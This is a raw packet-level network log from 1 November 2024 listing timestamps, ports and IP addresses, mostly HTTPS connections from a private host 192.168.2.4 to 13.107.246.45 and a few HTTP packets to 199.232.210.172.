Nov 1, 2024 10:51:09.508516073 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.508522987 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.508533001 CET	49806	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.508538008 CET	443	49806	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.510479927 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.510492086 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.510571003 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.510684967 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.510691881 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.543780088 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.544384956 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.544435024 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.544459105 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.544471025 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.544480085 CET	49807	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.544485092 CET	443	49807	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.546430111 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.546447039 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.546531916 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.546715975 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.546729088 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.561203003 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.561511040 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.561520100 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.561887026 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.561891079 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.708252907 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.708300114 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.708385944 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.708653927 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.708667040 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.708678007 CET	49808	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.708683014 CET	443	49808	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.711242914 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.711262941 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.711340904 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.711487055 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:09.711493015 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:09.784946918 CET	49724	80	192.168.2.4	199.232.210.172
Nov 1, 2024 10:51:09.790040970 CET	80	49724	199.232.210.172	192.168.2.4
Nov 1, 2024 10:51:09.790108919 CET	49724	80	192.168.2.4	199.232.210.172
Nov 1, 2024 10:51:10.112729073 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.113173008 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.113192081 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.113640070 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.113645077 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.115039110 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.115410089 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.115420103 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.115828037 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.115832090 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.236637115 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.237073898 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.237081051 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.237348080 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.237351894 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.241910934 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.241957903 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.242007017 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.242116928 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.242125988 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.242134094 CET	49809	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.242140055 CET	443	49809	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.243448973 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.243508101 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.243546963 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.243611097 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.243622065 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.243629932 CET	49810	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.243635893 CET	443	49810	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.244658947 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.244684935 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.244755983 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.244875908 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.244889021 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.245209932 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.245229959 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.245289087 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.245384932 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.245395899 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.275450945 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.275826931 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.275841951 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.276093006 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.276098967 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.365221977 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.365437031 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.365490913 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.365521908 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.365526915 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.365535975 CET	49811	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.365539074 CET	443	49811	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.367752075 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.367795944 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.367860079 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.368000984 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.368017912 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.407469034 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.407763958 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.407928944 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.407928944 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.407928944 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.409893036 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.409923077 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.409985065 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.410115004 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.410128117 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.454252005 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.454591036 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.454602003 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.455099106 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.455102921 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.586057901 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.586163998 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.586206913 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.586244106 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.586251020 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.586262941 CET	49813	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.586266994 CET	443	49813	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.588654041 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.588676929 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.588799953 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.588979006 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.588992119 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.628428936 CET	49812	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.628454924 CET	443	49812	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.970808983 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.971362114 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.971390963 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.971703053 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.971708059 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.975996971 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.981158018 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.981174946 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:10.981652975 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:10.981657982 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.100426912 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.100775003 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.100833893 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.100871086 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.100883961 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.100893974 CET	49814	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.100898981 CET	443	49814	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.103236914 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.103265047 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.103354931 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.103466034 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.103477001 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107121944 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107194901 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107196093 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107255936 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.107327938 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.107336998 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107346058 CET	49815	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.107348919 CET	443	49815	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107489109 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.107506990 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.107937098 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.107943058 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.109313965 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.109344006 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.109410048 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.109519005 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.109533072 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.135766029 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.136138916 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.136152983 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.136614084 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.136617899 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.239003897 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.239196062 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.239248037 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.239279032 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.239296913 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.239306927 CET	49816	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.239316940 CET	443	49816	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.241085052 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.241111994 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.241184950 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.241305113 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.241316080 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.263958931 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.264174938 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.264229059 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.264256001 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.264266968 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.264275074 CET	49817	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.264280081 CET	443	49817	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.265882969 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.265898943 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.265966892 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.266073942 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.266083002 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.332144022 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.332453966 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.332473993 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.332842112 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.332848072 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.464539051 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.465619087 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.465681076 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.465723991 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.465738058 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.465749979 CET	49818	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.465755939 CET	443	49818	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.468044043 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.468060017 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.468132019 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.468261957 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.468271017 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.833220005 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.845154047 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.845175028 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.845707893 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.845711946 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.940772057 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.941677094 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.941698074 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.941988945 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.941993952 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.971224070 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.972124100 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.972197056 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.972363949 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.972363949 CET	49819	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.972376108 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.972383022 CET	443	49819	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.974620104 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.974647999 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.974721909 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.974858046 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.974872112 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.989178896 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.989572048 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.989584923 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.989875078 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.989881039 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.991214037 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.991441965 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.991451025 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:11.991780996 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:11.991785049 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.069628000 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.069752932 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.069900990 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072217941 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072217941 CET	49820	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072225094 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072228909 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.072237015 CET	443	49820	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.072249889 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.072323084 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072448969 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.072460890 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121084929 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121157885 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121176958 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121282101 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121309042 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121474981 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121474981 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121474981 CET	49822	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121481895 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121488094 CET	443	49822	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121704102 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121715069 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.121740103 CET	49821	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.121742964 CET	443	49821	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.123704910 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123733044 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.123785019 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123795986 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.123825073 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123857021 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123980999 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123981953 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.123990059 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.123996973 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.195940971 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.196352959 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.196361065 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.196657896 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.196661949 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.326694012 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.326739073 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.326937914 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.326988935 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.326994896 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.327003002 CET	49823	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.327006102 CET	443	49823	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.329446077 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.329482079 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.329732895 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.329859018 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.329880953 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.707916975 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.708322048 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.708336115 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.708781958 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.708789110 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.824194908 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.825139999 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.825155020 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.825706005 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.825711012 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.843645096 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.844594955 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.844600916 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.844964981 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.844968081 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.849421024 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850351095 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850368023 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850420952 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.850420952 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.850435019 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850447893 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850790977 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.850908995 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.850908995 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.850935936 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.851356983 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.851356983 CET	49824	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.851372957 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.851380110 CET	443	49824	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.862035036 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.862062931 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.862193108 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.862288952 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.862298965 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.953978062 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.954051018 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.954109907 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.954323053 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.954334974 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.954344988 CET	49825	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.954349041 CET	443	49825	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.963787079 CET	49830	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.963821888 CET	443	49830	13.107.246.45	192.168.2.4
